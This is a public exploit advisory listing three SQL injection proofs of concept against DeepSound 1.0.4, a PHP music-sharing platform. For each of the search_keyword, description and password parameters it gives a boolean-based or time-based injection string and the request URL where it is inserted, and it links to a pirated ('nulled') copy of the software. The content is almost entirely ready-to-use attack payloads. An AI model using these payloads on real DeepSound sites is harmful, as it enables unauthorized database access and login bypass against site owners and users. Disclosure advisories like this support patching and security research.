DeepSound 1.0.4 - SQL Injection

2019-05-16 21:05:12

===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : search_keyword
# Attack Pattern : ' aNd 9521793=9521793 aNd '6199'='6199
# POST Method :
http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : description
# Attack Pattern : ') aNd if(length(0x454d49524f474c55)>1,sleep(3),0)
--
# POST Method : http://localhost/Script/admin?id=&description=[TEXT
INPUT]2350265[SQL Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : ") aNd 7595147=7595147 aNd ("6199")=("6199
# POST Method :
http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL
Inject Here]
===========================================================================================
###########################################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.